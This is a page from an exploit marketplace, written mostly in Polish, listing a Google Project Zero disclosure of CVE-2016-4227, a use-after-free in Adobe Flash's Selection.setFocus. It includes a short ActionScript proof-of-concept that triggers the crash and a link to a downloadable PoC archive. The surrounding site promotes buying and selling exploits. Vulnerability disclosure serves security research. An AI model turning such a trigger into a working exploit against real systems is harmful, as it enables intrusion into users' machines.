[ home ]  [ prywatne ]  [ 0Day ]  [ discount ]  [ Zdobądź Gold ]  [ platformy ]  [ pentest ]  [ szukaj ]  [ faq ]  [ kontakt ]  [ styl ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Oficjalny Facebook
0day.today Exploit DB Oficjalny Twitter
0day.today Exploit DB Oficjalny Kanał RSS
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Największa Baza Exploitów na Świecie.
Wybierz język:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Informacje które powinieneś wiedzieć o 0day.today:
  • Korzystamy z jednej głównej domeny: http://0day.today
  • Większość materiałów jest kompletnie DARMOWA
  • Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
    musisz zakupić lub zdobyć GOLD
We accept currencies: [contact admin to find more]
           
Nie chcemy byś używał naszej strony jako narzędzia do włamań, więc każdą czynnością która nielegalnie wpływa na innych użytkowników lub cudze witryny, narażasz się na zbanowanie i usunięcie wszystkich materiałów.

Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Jestem zarejestrowanym użytkownikiem 0day.today. Nie chcę widzieć tej notyfikacji w przyszłości.
Co na początek?
  1. Przeczytaj [ ugoda ]
  2. Przeczytaj [ Wyślij ] zasady
  3. Odwiedź [ faq ] strona
  4. [ Zarejestruj ] profil
  5. Zdobądź [ GOLD ]
  6. Jeżeli chcesz [ sprzedaj ]
  7. Jeżeli chcesz [ kup ]
  8. Jeżeli stracisz [ Konto ]
  9. Jakiekolwiek pytania [ [email protected] ]


Główne linki


Możesz się z nami skonaktować przez

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ autoryzacja ] [ rejestracja ] [ odzyskaj konto ]
Skontaktuj się
Możesz się z nami skonaktować przez:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Market Exploitów i Baza Exploitów 0day

Adobe Flash - Selection.setFocus Use-After-Free

Autor
Google Security Research
Ryzyko
[
Średnie Zagrożenie Bezpieczeństwa
]
0day-ID
0day-ID-26124
Kategoria
dos / poc
Data dodania
28-08-2016
CVE
CVE-2016-4227
Platforma
multiple
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841
 
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
 
A minimal PoC follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap here
 
    }
 
A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip

#  0day.today [2024-07-02]  #
0day.today Exploit Database kupuj i sprzedawaj exploity (local, remote, DoS, PoC, etc.)
Wszystkie zgłoszenia składać na mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team